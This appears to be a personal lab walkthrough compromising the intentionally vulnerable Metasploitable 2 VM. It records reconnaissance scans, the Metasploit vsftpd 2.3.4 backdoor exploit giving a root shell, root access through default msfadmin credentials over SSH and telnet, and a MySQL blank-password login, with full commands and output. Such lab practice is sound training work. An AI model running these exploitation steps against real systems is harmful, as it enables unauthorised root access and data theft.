1. IP address : 192.168.76.135
2. nmap -sC -sV -T4  192.168.76.135 >> nmap.txt
3. gobuster dir -u 192.168.76.135 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
==============================================================================================================================
/index (Status: 200)
/test (Status: 301)
/twiki (Status: 301)
/tikiwiki (Status: 301)
==============================================================================================================================
4. enum4linux 192.168.76.135 >> enum4lunux.txt 
---------------------------------------------------------------
==============================================================================================================================
5. Lets exploit PORT 21 ie File transfer protocols:
==============================================================================================================================
#Result we got from Metasploit: 

PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.76.138
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
#Service : vsftpd 2.3.4 
Exploit Title                                                                                                                        |  Path
-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
6. vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                                                | unix/remote/17491.rb
---------------------------------------------------------
7. service postgresql start
8. msfconsole. 
9.  msf6 > search vsftpd 2.3.4

Matching Modules
==============================================================================================================================================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

10. msf6 > use exploit/unix/ftp/vsftpd_234_backdoor 
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.76.135
RHOSTS => 192.168.76.135

11. msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 192.168.76.135:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.76.135:21 - USER: 331 Please specify the password.
[+] 192.168.76.135:21 - Backdoor service has been spawned, handling...
[+] 192.168.76.135:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.76.135:6200) at 2021-03-18 04:00:14 -0800
12. We got the shell 
pwd
/
whoami
root

#We got the root access for the service FTP. 
---------------------------------------------------------------------------------------------------------------------------------------
==============================================================================================================================
	Lets exploit SSH
==============================================================================================================================
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

#Since we got the username and password to login from the index page : Login with msfadmin/msfadmin to get started
username: msfadmin
password: msfadmin

ssh msfadmin@192.168.76.135
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Wed Mar 17 02:23:28 2021 from 192.168.76.138

msfadmin@metasploitable:~$ 

msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ sudo su
[sudo] password for msfadmin: 
root@metasploitable:/home/msfadmin# 

#We got the root 
==============================================================================================================================
==============================================================================================================================
	Lets exploit Telnet: 
==============================================================================================================================
23/tcp   open  telnet      Linux telnetd
──(root💀Sumedh)-[/home/sumedh]
└─# telnet 192.168.76.135                                                                                                                                           1 ⨯

Trying 192.168.76.135...
Connected to 192.168.76.135.
Escape character is '^]'.
                _                  _       _ _        _     _      ____  
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ 
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ 
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                            |_|                                          


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


metasploitable login: msfadmin
Password: 
Last login: Thu Mar 18 02:23:01 EDT 2021 from 192.168.76.138 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
msfadmin@metasploitable:~$ 
msfadmin
msfadmin@metasploitable:~$ sudo su
root@metasploitable:/home/msfadmin#

#We got access to ROOT
==============================================================================================================================
==============================================================================================================================
		Lets exploit MYSQL: 
==============================================================================================================================

msf6 > search mysql_login

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility

msf6 auxiliary(scanner/mysql/mysql_login) > show options
==============================================================================================================================
Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.76.135
RHOSTS => 192.168.76.135
msf6 auxiliary(scanner/mysql/mysql_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/mysql/mysql_login) > exploit

[+] 192.168.76.135:3306   - 192.168.76.135:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.76.135:3306   - No active DB -- Credential data will not be saved!
[+] 192.168.76.135:3306   - 192.168.76.135:3306 - Success: 'root:'
[*] 192.168.76.135:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

#Lets try to connect MYSQL database from terminal : 
	command : mysql -u (username) -h (IP address) -p (password) 
┌──(root💀Sumedh)-[/home/sumedh/Desktop/metasploitable2]
└─# mysql -u root -h 192.168.76.135 -p                                                                                                                              1 ⨯
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 9
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.001 sec)

MySQL [(none)]> 